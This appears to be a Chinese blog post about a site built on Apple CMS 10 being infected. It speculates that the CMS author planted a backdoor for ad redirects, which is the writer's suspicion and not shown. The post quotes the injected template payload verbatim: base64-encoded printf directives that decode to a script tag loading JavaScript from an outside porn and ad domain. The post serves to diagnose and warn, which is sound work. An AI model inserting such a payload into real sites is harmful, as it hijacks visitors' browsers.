苹果cms10的一次尝试发现了苹果cms10被挂马极有可能是苹果cms作者故意的js漏洞或后门导致

本文讲述了作者在使用苹果CMS10建立网站时遇到的挂马问题,分析了可能的原因是CMS作者故意留下的JS漏洞或后门。详细介绍了挂马的表现,如播放视频时加载奇怪字符,疑似DOM XSS攻击。作者怀疑这可能是作者为增加广告收入而进行的跳转。提出了更换CMS系统的解决办法,推荐了海洋CMS、马克斯CMS等替代方案。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

最近闲无事想建个站来玩玩,但是又不想写于是乎就找了搜索了一下,苹果cms就出现在搜索引擎上面了,看来苹果cms的SEO做的还是不错的.

被挂马表现:

  • 播放视频时,有一定的概率会加载 http://union.maccms.com/html/top10.js
  • 苹果cms后台某处或者采集的资源打印奇怪的字符比如
    {if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuanM+PC9zY3JpcHQ+"))}{endif-A}{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuanM+PC9zY3JpcHQ+"))}{endif-A}{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuanM+PC9zY3JpcHQ+"))}{endif-A}
    解码其中的Base64的字符串后是
    <script src=https://ad2123.lsjporn.top/upload/aaaa.js></script>
    这也就是传说中的DOM XSS攻击

其实苹果CMS一直以来都是加密了最重要的播放器载入js,而且一直在打开播放页的时候 player.js 会载入一个,//union.maccms.com/html/top10.js 文件,最

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值